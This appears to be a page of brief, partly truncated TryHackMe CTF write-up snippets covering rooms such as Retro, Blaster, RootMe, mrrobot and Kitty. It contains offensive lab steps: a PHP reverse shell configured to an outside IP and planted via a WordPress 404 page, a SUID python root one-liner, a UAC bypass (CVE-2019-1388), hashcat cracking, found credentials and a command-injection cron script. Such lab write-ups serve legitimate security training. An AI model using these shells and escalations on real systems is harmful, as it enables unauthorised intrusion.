Agent T
Sigh, not sure what to do. At a glance it's dev; went to look, and it's the 8.1 RCE again.
Insekube
Broken again, skipped it.
PalsForLife
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-12 13:43 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
Initiating Ping Scan at 13:43
Scanning 10.10.139.174 [2 ports]
Completed Ping S ...
Anonforce
Retro
Hard. PHP, WordPress, in via the 404.

C:\Users>whoami /all
ERROR: Unable to get user claims information.

USER INFORMATION
----------------

User Name         SID
================= ===============================================================
iis apppool\retro S-1-5-82-3788814120-2795558051-4026253505-1810414383-1644260341

GROUP INFORMATION
-----------------

Group Name Type SID Attributes ...
Blaster
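CVE-2019-1388: this vulnerability lies in the Windows UAC (User Account Control) mechanism. Think of it as a prompt window that is launched by SYSTEM. When you control this prompt window and open HHUPD.EXE with administrator privileges, you can view the certificate; the browser opened at that point has super-administrator privileges. From there, navigate to cmd.exe, and opening it gives a cmd with SYSTEM privileges.
run persistence -X for persistence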
Tony the Tiger
The /invoker/JMXInvokerServlet request reads an object passed in by the user, so arbitrary code can be executed through a gadget in Apache Commons Collections. Used the provided PoC.
grep -R "THM{" * 2>/dev/null
In root there is this: QkM3N0FDMDcyRUUzMEUzNzYwODA2ODY0RTIzNEM3Q0Y==
Base64-decode it: BC77AC072EE30E3760806864E234C7CF
Not sure whether it means anything.
hashcat -a 0 -m 0 BC77AC072EE30E3760806864E234C7CF /usr/share/wordlists/rockyou.txt --force
zxcvbnm123456789 …
RootMe
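This room is step by step; if you follow its guidance you can generally finish it. Without reading the hints, the approach is the same.
Start with a scan and brute-force the directories, find panel, and then you can upload a file.
Here I used php5 to bypass the filter; after the bypass, connect with AntSword and get a reverse shell.
Once the shell comes back, look for SUID permissions; found python.
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
That gives root.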
mrrobot
This is exactly what I was looking for, sob.
First a directory scan, which finds useful routes such as robots, license and login.
Log in with the credentials elliot:ER28-0652.
It turns out to be a WP site, so directly edit the 404 page to get a reverse shell.
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '165.154.5.221'; // You have changed this
$port = 9999; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0 ...
Kitty
Clearly a blind injection.
# Not finished, just noting this down … what a lousy network, torture.
!!! Don't forget the space! Damn it.
Then use binary to determine upper and lower case.
Use pspy to detect scheduled tasks.
get it
#!/bin/sh
while read ip;
do
  /usr/bin/sh -c "echo $ip >> /root/logged";
done < /var/www/development/logged

if (preg_match( $evilword, $username )) {
    echo 'SQL Injection detected. This incident will be logged!';
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    $ip .= "\n";
    file_put_contents("/var/www/development ...
The Great Escape
┌──(kali㉿kali)-[~]
└─$ curl -I 10.10.45.78/api/fl46
HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Mon, 05 Feb 2024 03:53:32 GMT
Connection: keep-alive
flag: THM{b801135794bf1ed3a2aafaa44c2e5ad4}

Kali inexplicably got a bit better.
dirb http://10.10.45.78/.well-known/ -X .txt
Anyway, so far I have found the exif-util file upload and snapshot; thinking SSRF. robots also lists a backup; look at that first.
<script>
export default {
  name: 'Exif Util',
  auth: false,
  data() {
    return {
      hasResponse: false,
      response: '',
      url: '', ...
Year of the Rabbit
Near-expiry food (
Follow it and take a look.
010 was no use; had to cat it directly.
ftpuser ...
dionysus